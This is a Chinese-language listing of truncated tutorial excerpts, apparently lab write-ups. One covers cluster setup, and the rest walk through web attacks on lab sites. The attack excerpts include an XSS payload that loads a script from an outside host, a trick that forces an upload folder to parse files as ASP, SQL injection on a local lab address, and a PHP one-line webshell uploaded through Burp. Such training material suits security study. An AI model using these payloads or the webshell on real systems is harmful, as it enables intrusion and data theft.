一 基础搭建本次集群搭建共有三个节点，包括一个主节点master，和两个从节点slave1和slave2。具体操作如下：1.1更改主机名使用finalshell连接平台所提供的master,slave1,slave2三台机器，并按照提供linux账号和密码登录，登录成功后进行以下操作：命令：h...

xss跨站脚本攻击首先登录xssaq之后创建新项目创建成功后，提取</tEXtArEa>'"><sCRiPt sRC=//uj.ci/i1w></sCrIpT> 之后打开网址“客户留言板块”注意两个放入代码的位置提交信息之后我们模拟...

文件上传漏洞（2）打开网站二打开网站根目录，在bookpic文件夹（该文件夹为存储用户上传文件的文件夹）下创建一个新文件夹“a.asp”（此步骤使得该网站将上传才该文件夹内的文件以asp文件的方式进行解析，使得该网站存在文件上传漏洞）在浏览网站前台后发现不存在可利用的文件上传点，因此金融网站后...

SQL注入漏洞利用开启网站一（默认网站）查看IP地址，确认网站是否正常开启在本机中成功打开使用kali虚拟机打开网站，寻找可能的漏洞利用点发现在“债务偿清”公告连接http://192.168.170.128/News_Show.asp?ID=92中出现显式传输数据，判定可能存在SQL注入漏洞...

文件上传漏洞利用打开burp打开burp自带浏览器，首先打开网站，登录进去后，找到文件上传漏洞入口在入口传输一句话木马文件，开启burp拦截包一句话木马内容<?php eval($_POST['pass']); ?>拦截到的数据包对thumb的信息进行url解码...